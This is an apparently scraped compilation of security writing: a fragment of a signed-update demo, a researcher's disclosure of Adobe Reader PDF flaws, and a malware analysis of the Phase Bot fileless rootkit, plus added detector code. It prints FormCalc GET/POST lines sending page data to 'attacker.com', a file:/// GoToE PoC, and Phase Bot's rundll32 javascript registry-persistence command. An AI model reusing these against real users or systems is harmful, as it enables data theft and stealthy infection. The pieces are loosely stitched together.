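def legit_cdn_factory(version, installer):
    """Constructed honest CDN serving a signed manifest and the matching installer."""
    manifest = sign_manifest(version, installer).encode()

    def fetch(path):
        if path == MANIFEST_PATH:
            return 200, manifest
        if path == "/v0/program/data/mbam-setup-%s.exe" % version:
            return 200, installer
        return 404, b""
    return fetch


def swap_installer(fetch, payload):
    """Wrap an honest fetch so only the installer bytes are replaced (on-path attacker)."""
    def wrapped(path):
        status, body = fetch(path)
        return (status, payload) if path.endswith(".exe") else (status, body)
    return wrapped


if __name__ == "__main__":
    print("vulnerable vs rogue CDN :", vulnerable_upgrade("1.60.1.1000", rogue_cdn)[0])
    print("hardened vs rogue CDN   :", hardened_upgrade("1.60.1.1000", rogue_cdn))
    good = legit_cdn_factory("2.0.3.0", b"MZ real installer (constructed)")
    print("hardened vs honest CDN  :", hardened_upgrade("1.60.1.1000", good)[0])
    print("hardened vs swapped exe :", hardened_upgrade("1.60.1.1000", swap_installer(good, PAYLOAD)))
```

Two things to note about the fix: the version number and the digest travel in one signed unit, so an attacker cannot keep a real manifest and only bump the version, and the digest is checked on the bytes that will actually be executed, not on a separate download. Transport security (HTTPS with a pinned certificate) would stop the DNS-based hijack in the post, but the signed manifest is what protects against a compromised CDN too.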
-
Multiple PDF Vulnerabilities - Text and Pictures on Steroids

I had the pleasure to talk at the HackPra in Bochum on 22.10 this year. My topic was about Adobe Reader and the vulnerabilities I found in version 11.0.09. The Adobe PSIRT team asked me to wait until they released a patch for the presented issues. Adobe was informed on the 7th of October and now the patch has finally arrived. The link to the HackPra talk will be posted here and on twitter (@insertscript) as soon as it is available on youtube.

Important Note: If you want to test a PoC, your IE needs to be configured to open PDFs inside the browser. Sometimes IE opens PDFs outside of the browser context, which breaks PoCs that rely on this context.

GotoE or GotoR - No Protocol Restrictions
Status: Unfixed
Reality: 50% fixed

The PDF standard defines a list of valid ActionTypes. Two of them, GotoE and GotoR, are used to tell the reader to load PDFs from a different location. Adobe Reader does not enforce protocol restrictions correctly, which makes it possible to change the location to file:///, mk-its: etc. They fixed it for GotoR but GotoE still works. In the context of web browsers it gives you the possibility to iframe the local file system etc. Javascript and VBscript were forbidden, so no XSS possibility :/

PoC:

%PDF-1.1
1 0 obj
<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 7 0 R >>
endobj
[..]
7 0 obj
<< /Type /Action /S /GoToE /F (file:///C:/) /D (Chapter 1) >>
endobj
[..]

PoC

Reader 11 vulnerability in predefined privileged Javascript functions (CVE-2014-8451)
Status: fixed
Reality: fixed

Before I explain the vulnerability you should have a look at another vulnerability in the privileged Javascript functions this year.
It explains the concept of privileged Javascript very well: https://molnarg.github.io/cve-2014-0521/

There are two major steps to get privileged Javascript execution:
1) Get our function marked as a trusted or trust propagator function
2) After it is marked as a trust propagator, get it called by an already trusted function.

The first step is achieved by calling the function app.trustPropagatorFunction with a function as the parameter. To be able to use it, you already need to be in trusted code execution. It sounds unrealistic to pass all these requirements, but one specific predefined function helped a lot. See for yourself: the only use of this function is to iterate over an object and mark all properties which are functions as trust propagator functions. Let's say this wasn't the best idea. The first major step is done. Now we need to get a trusted function to call our marked function. If you are familiar with Javascript you know that this is not that difficult to achieve. Let's have a look at the following predefined function: we can influence doc.path.match and let it point to our trust-propagator function. As soon as it gets called, we are in privileged Javascript mode, so we can read local files, as an example. The PoC reads a local file from C:\test.txt:

PoC

Fix: It seems like Adobe disabled/protects app.trustPropagatorFunction, because it triggers a security exception now.

Javascript function in Reader can be used to read data from external entities (CVE-2014-8452)
Status: Fixed
Reality: Not Fixed

This one is about a simple XXE I discovered. I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in XMLData.parse. It was possible to use external entities and reference them. I read the specification and it turns out there are more functions than "parse" to read XML. I created a simple xml file, which references a url from the same domain, and parsed it with loadXML.
It worked:

PoC

The impact is limited because:
o) it is limited to same origin
o) HTML pages break the xml
o) dynamic entities are not supported
o) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but it didn't work.

But it still can be used to read JSON.

Same origin policy bypass in Reader (CVE-2014-8453)
Status: fixed
Reality: fixed but same origin still vulnerable!

In my opinion this is the most powerful vulnerability. Even without the origin bypass it shows you how powerful/terrifying PDF can be. Many people know that PDF supports a scripting language called Javascript, but there is another one. It is mentioned in the specification for XFA, a file type also supported by the Adobe Reader. It is called FormCalc and it is not that powerful. It is used for simple math calculation. But in the Adobe specification there are three additional functions: 'GET', 'POST' and 'PUT'. Yes, their names speak for themselves. 'GET' has one parameter: a url. It will use the browser (YEAH COOKIES) to retrieve the url and return its content. We can then use 'POST' to send the returned content to our own server:

var content = GET("myfriends.php");
Post("http://attacker.com",content);

These functions are same origin, so a website needs to allow us to upload a PDF. That's not that unrealistic for most websites. Attacker.com is not same origin, so you need to set up a crossdomain.xml, as usual with Adobe products. To sum up: this is not a bug, this is a feature. As soon as you are allowed to upload a PDF on a website, you can access the website in the context of the user who is viewing the PDF. Because the requests are issued by the browser, cookies are sent too. You can also use it to break any CSRF protection by reading the tokens.

PoC

After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser as a proxy (@beef still working on the module^^). The bypass is really simple:
1. User A loads evil.pdf from http://attacker.com/evil.pdf
2. evil.pdf uses FormCalc GET to read http://attacker.com/redirect.php
3. redirect.php redirects with 301 to http://facebook.com
4. Adobe Reader will follow and read the response without looking for a crossdomain.xml.
5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php

This simple bypass is fixed now. I hope they're going to implement a dialog warning for same origin requests too.

Posted by Alex Inführ at 6:34 AM

Source: InsertScript: Multiple PDF Vulnerabilities - Text and Pictures on Steroids
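The issues in this post share a theme: actions and scripts inside a PDF that reach outside the document, whether to the local file system (GoToE with file:), to XML entities, or to the network (FormCalc Get/Post/Put). The scanner below is an added example, not InsertScript's PoCs or code: it flags those constructs in raw PDF bytes and assigns a coarse risk level, which is the triage a gateway or upload handler would want before letting a user-supplied PDF through. The sample documents are constructed (the first reuses the GoToE fragment from the post). Regexes over raw bytes only see uncompressed objects, so real-world files need their /FlateDecode streams inflated first; the code says so where it matters.

```python
import re

# Constructed sample documents. The first is the GoToE fragment from the post
# (uncompressed, so the action is visible in the raw bytes); the second is a
# minimal XFA form carrying FormCalc Get/Post calls like the ones described.
GOTOE_PDF = b"""%PDF-1.1
1 0 obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 7 0 R >> endobj
7 0 obj << /Type /Action /S /GoToE /F (file:///C:/) /D (Chapter 1) >> endobj
"""

XFA_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /AcroForm 2 0 R >> endobj
2 0 obj << /XFA 3 0 R >> endobj
3 0 obj << /Length 200 >> stream
<template><subform><event activity="initialize">
<script contentType="application/x-formcalc">
var content = Get("myfriends.php")
Post("http://attacker.example/log.php", content)
</script></event></subform></template>
endstream endobj
"""

CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"

# (finding name, pattern). These run over raw bytes: objects inside compressed
# streams are NOT seen. Inflate /FlateDecode streams (e.g. with a PDF library)
# before scanning real files, or the scan is trivially bypassed.
RULES = [
    ("remote-goto-action", re.compile(rb"/S\s*/GoTo[ER]\b")),
    ("goto-file-uri", re.compile(rb"/S\s*/GoTo[ER][^>]*?/F\s*\((?:file:|mk-its:)", re.I)),
    ("javascript-action", re.compile(rb"/S\s*/JavaScript\b")),
    ("xfa-form", re.compile(rb"/XFA\b")),
    ("formcalc-script", re.compile(rb'contentType="application/x-formcalc"', re.I)),
    ("formcalc-network-call", re.compile(rb"\b(?:Get|Post|Put)\s*\(", re.I)),
]


def scan_pdf(data):
    """Return the sorted list of finding names present in the raw PDF bytes."""
    found = set()
    for name, pattern in RULES:
        if pattern.search(data):
            found.add(name)
    # Get(/Post(/Put( are only the FormCalc network primitives inside a FormCalc
    # script; outside one they are just identifiers, so do not report them.
    if "formcalc-network-call" in found and "formcalc-script" not in found:
        found.discard("formcalc-network-call")
    return sorted(found)


def risk_level(findings):
    """Coarse triage: anything that talks to the network or the file system is high."""
    high = {"formcalc-network-call", "goto-file-uri"}
    if high & set(findings):
        return "high"
    if findings:
        return "medium"
    return "none"


if __name__ == "__main__":
    for label, doc in (("gotoe", GOTOE_PDF), ("xfa", XFA_PDF), ("clean", CLEAN_PDF)):
        findings = scan_pdf(doc)
        print(label, risk_level(findings), findings)
```

The "medium" bucket (a GoToR to an http: target, an XFA form without FormCalc, a plain JavaScript action) is where a policy decision belongs; the post's point is that the "high" bucket, FormCalc with Get/Post, is a documented feature rather than a bug, so a site that accepts PDF uploads has to treat it as such.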
-
We will fix the "mobile" problem in the near future. I hope.
-
Nobody has the time. I'm not good at it.
-
One word: SEO.
-
Hard to implement.
-
[h=1]Paul Jung - Bypassing Sandboxes for Fun[/h]
-
[h=1]Osama Kamal - DNS Analytics, Case Study[/h]
-
[h=1]Phase Bot - A Fileless Rootkit[/h]

Phase Bot is a fileless rootkit that went on sale during late October. The bot is fairly cheap ($200) and boasts features such as formgrabbing, ftp stealing, and of course the ability to run without a file. The first thing you notice when opening it up in IDA is that the AddressOfEntryPoint is 0; this may seem like an error, but it actually isn't. Setting the entry point to 0 means the start of the DOS header is used as the entry point. This is possible because most of the fields following the MZ signature aren't required, and the M (0x4D) and Z (0x5A) are actually valid instructions (dec ebp and pop edx respectively). I'm not sure of the actual purpose of this trick, but it's interesting nonetheless.

Figure: Cancels out the MZ instructions then jumps to the real entry point.

The real entry point is contained within the first 560 bytes of the only section in the executable. This code is designed to get data stored within the non-essential NT header fields and use it to RC4 decrypt the rest of the section, which contains the 2nd stage (shellcode). Most initialization happens in what appears to be the world's longest function; the executable doesn't have an import table, so functions are resolved by hash. All the initialized data such as offsets, strings, and function addresses is stored within a large structure which is passed to all functions.

Figure: but does anyone truly know what loops are?

Once initialization is done the bot then checks that PowerShell and version 2 of the .net framework are installed: if they are, normal installation continues; if not, it writes the bot code to a file in the startup folder.
The malware first creates the registry key "hkcu\software\microsoft\active setup\installed components\{<GUID_STRING>}", then RC4 encrypts the 2nd stage's shellcode with the key "Phase" and writes it under the subkey "Rc4Encoded32". Afterward, the 64-bit shellcode is extracted and written to the Rc4Encoded64 subkey, also encrypted with "Phase" as the key. A 3rd subkey is created named "JavaScript", which contains some JavaScript code. The full JavaScript is a bit long to post here, so I've uploaded it to pastebin. It simply base64 decodes a PowerShell script designed to read and decrypt the shellcode from the Rc4Encoded subkey, then runs it; you can find the decoded PowerShell script here (the comments were left in by the author).

For the bot to start with the system, a subkey named "Windows Host Process (RunDll)" is created under "hkcu\software\microsoft\windows\currentVersion\run", with the following value:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close();

This is a trick used by Win32/Poweliks to get rundll32 to run the code from the JavaScript subkey, which then base64 decodes the PowerShell script and runs it with PowerShell.exe; you can read more about this trick here.

The final stage, which runs from within PowerShell, hooks the following functions by overwriting the first instruction with 0xF4 (HLT).
ntdll!NtResumeThread (Inject new processes)
ntdll!NtReadVirtualMemory (Hide malware's memory)
ntdll!NtQueryDirectoryFile (Hide file, only if failed fileless installation)
ws2_32!send (Data stealer)
wininet!HttpSendRequest (Internet Explorer formgrabber)
nss3!PR_Write (Firefox formgrabber)

The HLT instruction is a privileged instruction which cannot be executed from ring 3; as a result it generates a 0xC0000096 Privileged Instruction exception, which the bot picks up and handles using a vectored exception handler. This is the same as standard software breakpoint hooking, but using an invalid instruction instead of int 3.

As you can imagine, the executable shows all sorts of malicious signs.

Image caption: NULL AddressOfEntryPoint, missing all data directories, invalid section name.

It should be noted that some of the features advertised appear to be missing and the comments in the PowerShell code suggest that this sample is an early/testing version. I'll update if I can get hold of a newer version.

Source: Phase Bot - A Fileless Rootkit | MalwareTech
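As an added example (my own code, not from the MalwareTech post or the Phase Bot sample), a small PE header check for the three signs named in the last caption: a NULL AddressOfEntryPoint, empty data directories and a non-printable section name. Since no binary is attached here, `build_sample_pe` constructs a minimal PE32 header to run it against.

```python
import struct

# Optional-header field offsets, relative to the start of the optional header.
_OPT_ENTRY_POINT = 16                    # AddressOfEntryPoint (uint32), PE32 and PE32+
_OPT_NUM_DIRS = {0x10B: 92, 0x20B: 108}  # NumberOfRvaAndSizes for PE32 / PE32+
_OPT_DIRS = {0x10B: 96, 0x20B: 112}      # first IMAGE_DATA_DIRECTORY entry (VA, Size)

def pe_header_anomalies(data: bytes) -> list:
    """Report the Phase Bot style header oddities found in a PE image."""
    findings = []
    if data[:2] != b"MZ":
        return ["not a PE file (missing MZ)"]
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ["not a PE file (missing PE signature)"]
    # IMAGE_FILE_HEADER: NumberOfSections at +6, SizeOfOptionalHeader at +20
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in _OPT_NUM_DIRS:
        return [f"unknown optional header magic 0x{magic:x}"]
    if struct.unpack_from("<I", data, opt + _OPT_ENTRY_POINT)[0] == 0:
        findings.append("AddressOfEntryPoint is 0 (execution starts at the DOS header)")
    num_dirs = struct.unpack_from("<I", data, opt + _OPT_NUM_DIRS[magic])[0]
    dirs = [struct.unpack_from("<II", data, opt + _OPT_DIRS[magic] + 8 * i)
            for i in range(num_dirs)]
    if not any(va or size for va, size in dirs):
        findings.append("all data directories are empty (no import table)")
    # Section headers (40 bytes each) follow the optional header; the name is the first 8 bytes
    sect = opt + size_opt
    for i in range(num_sections):
        name = data[sect + 40 * i:sect + 40 * i + 8].rstrip(b"\0")
        if not name or not all(32 < b < 127 for b in name):
            findings.append(f"section {i} has an invalid name {name!r}")
    return findings

def build_sample_pe(entry_point: int, import_dir: tuple, section_name: bytes) -> bytes:
    """Constructed minimal PE32 header for testing; not a real executable."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, _OPT_ENTRY_POINT, entry_point)
    struct.pack_into("<I", opt, 92, 16)                                 # 16 data directories
    struct.pack_into("<II", opt, 96 + 8, *import_dir)                   # directory 1 = imports
    section = section_name.ljust(8, b"\0") + b"\0" * 32
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + section
```

The same checks apply unchanged to a PE32+ image, since the entry point offset is shared and the directory offsets are looked up by magic.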
